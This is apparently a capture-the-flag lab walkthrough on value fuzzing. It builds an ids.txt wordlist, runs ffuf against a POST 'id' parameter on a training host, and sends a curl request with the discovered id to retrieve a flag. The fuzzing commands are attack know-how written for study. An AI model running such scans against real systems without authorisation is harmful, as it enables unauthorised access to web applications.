Value Fuzzing

Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?

As suggested, we'll create a custom ids.txt file to fuzz the application

for i in $(seq 1 1000); do echo $i >> ids.txt; done                                                                                                     

We'll then fuzz the application with our custom wordlist with the following command:

ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:37515/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'        

After we successfully fuzzed the application, as the image above shows, we found a working id.

Now, all we have to do is send a curl command to see the content of the page:

curl http://admin.academy.htb:37515/admin/admin.php -X POST -d 'id=73' -H 'Content-Type: application/x-www-form-urlencoded'

And we found our flag!